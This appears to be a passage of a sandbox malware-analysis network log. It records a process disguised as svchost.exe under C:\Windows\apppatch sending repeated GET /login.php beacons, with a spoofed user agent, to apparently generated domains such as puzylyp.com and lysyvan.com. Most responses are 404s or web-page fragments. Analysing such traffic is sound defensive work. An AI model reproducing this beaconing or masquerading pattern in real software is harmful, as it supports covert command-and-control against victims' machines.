                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79
                                                                                                                                                                                                          Data Ascii: tent .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70
                                                                                                                                                                                                          Data Ascii: ble,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[typ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 63212 | 75.2.71.199 | 443 | 1736 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:28 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com
Connection: Keep-Alive
2024-11-11 17:24:28 UTC | 352 | IN | HTTP/1.1 200 OK
Alt-Svc: h3=":443"; ma=2592000
Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 11 Nov 2024 17:24:28 GMT
Etag: "thhv81oall19wv"
Server: Caddy
Server: awselb/2.0
Vary: Accept-Encoding
X-Powered-By: Next.js
Connection: close
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port
7 | 192.168.2.8 | 63213 | 188.114.96.3 | 443

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:30 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-11-11 17:24:31 UTC | 949 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:24:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYInVkQAk1Xvke%2BhWXJENW%2FYYIUMCfDNjM7sQzEZ6F0ttiMwQesDUGPkVS%2BpLpODDVkSDIC3KTTjzFaFgQ3Fw23pry%2FDMDCxXKbl76V3MGg0LJZG0vJopElRFhfK0A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ff9e99aa58c1e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1250&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2305732&cwnd=246&unsent_bytes=0&cid=1e1901910ae2c204&ts=841&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 61823 | 188.114.97.3 | 443 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:32 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-11-11 17:24:34 UTC | 1092 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:34 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="84.3",amp_style_sanitizer;dur="40.6",amp_tag_and_attribute_sanitizer;dur="38.1",amp_optimizer;dur="22.2"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TJiLYd4KKBd%2Fm7d%2BhBa9drInBBwIM4663Z7ZrbKl2D7ZKJPHW%2B0gd1PnkggHXThGKW%2FkxLs0QxD%2F2XgJ8dwNTrNwYoSK8uTywtDjgvGWPFEo59mPwEBFyeAHEYmuLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9fa5f0c0f5b-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1240&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=e9b2a8aaf2341270&ts=1571&x=0"
                                                                                                                                                                                                          Data Ascii: ttom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!
                                                                                                                                                                                                          2024-11-11 17:24:34 UTC1369INData Raw: 77 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64
                                                                                                                                                                                                          Data Ascii: w:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accord


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 61824 | 188.114.97.3 | 443 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:35 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysyvan.com
Connection: Keep-Alive
2024-11-11 17:24:36 UTC | 1089 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:24:36 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
server-timing: amp_sanitizer;dur="34.2",amp_style_sanitizer;dur="16.3",amp_tag_and_attribute_sanitizer;dur="13.9",amp_optimizer;dur="17.2"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kus9P3y2%2BRqvAVpyEpaJbKgn68tLj1%2Bji4%2BAtNVBXpmuJbq0nb0w160qXy1KZOatWKVJpfdNsQrddTj6eftlrA8TO0BAZmgs%2BdO2mANgqhVgubhVbcamjvpbqxPuZw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ffa09bfebac30-YYZ
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=12237&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=236678&cwnd=37&unsent_bytes=0&cid=1a8a2e71f1f2f113&ts=1547&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
10 | 192.168.2.8 | 53531 | 75.2.71.199 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:25:54 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com
Connection: Keep-Alive
2024-11-11 17:25:55 UTC | 352 | IN | HTTP/1.1 200 OK
Alt-Svc: h3=":443"; ma=2592000
Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 11 Nov 2024 17:25:55 GMT
Etag: "3jk05lyot219wv"
Server: Caddy
Server: awselb/2.0
Vary: Accept-Encoding
X-Powered-By: Next.js
Connection: close
Transfer-Encoding: chunked
                                                                                                                                                                                                          Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                          Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                          Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                          Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                          Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                          2024-11-11 17:25:55 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                          Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


Session ID | Source IP | Source Port | Destination IP | Destination Port
11 | 192.168.2.8 | 53540 | 188.114.96.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:25:55 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-11-11 17:25:56 UTC | 959 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:56 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1q%2FLtAjLrraWfZWMWr6k9FNeLWhoeB6mvFaA4%2FPSwWbjHXUmeH04%2FkkSuj%2BX9M0UVbfUxC74hrhiT%2FFbwnSOw%2Ffq%2B6K8ezY8Hp4XS7%2FpPuxT0oegprFZw1wbgaHK%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffbffeadb182d-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2473099&cwnd=251&unsent_bytes=0&cid=e42556b4c044e8f3&ts=796&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 53543 | 188.114.96.3 | 443 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:25:57 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC949INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:58 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3uzluE%2B5GVqzzY2kY8vJvXK4WazQ5i0dF51uloPWmsOqWjIlA8Q7rB88OEc4foIrLrO1ygkx71D9HS%2BY%2FqOIopG8qWPHZ5R02uEgUgg8fhN%2FquO1rvC4TyTrboNdqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc0a4e164325-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1198&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=71331d2500b9e766&ts=781&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.8  53549        188.114.96.3    443               1736  C:\Windows\apppatch\svchost.exe
Timestamp                Bytes transferred  Direction  Data
2024-11-11 17:25:59 UTC  267                OUT        GET /login.php HTTP/1.1
                                                       Referer: http://www.google.com
                                                       User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                       Host: lysyvan.com
                                                       Connection: Keep-Alive
2024-11-11 17:26:00 UTC  1083               IN         HTTP/1.1 404 Not Found
                                                       Date: Mon, 11 Nov 2024 17:26:00 GMT
                                                       Content-Type: text/html; charset=utf-8
                                                       Transfer-Encoding: chunked
                                                       Connection: close
                                                       vary: Accept-Encoding
                                                       expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                       Cache-Control: no-cache, must-revalidate, max-age=0
                                                       link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                       server-timing: amp_sanitizer;dur="39.8",amp_style_sanitizer;dur="14.6",amp_tag_and_attribute_sanitizer;dur="19.8",amp_optimizer;dur="20.4"
                                                       cf-cache-status: DYNAMIC
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1oh8r9mKlLNoJYvnWdzuKvm4aYVeUyhRNhyQczsrQQT%2BRyquiLJCABmPtPcEWccV2LDyGjlxsoWtRgi1OuNlv0flSzl0GZZnqDH5SvynmSCCXAItng4Vhrt2yuZug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8e0ffc174951ac06-YYZ
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=11837&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=243955&cwnd=37&unsent_bytes=0&cid=49c92739f32545da&ts=1431&x=0"
                                                                                                                                                                                                          Data Ascii: -amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-ele
                                                                                                                                                                                                          2024-11-11 17:26:00 UTC1369INData Raw: 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74
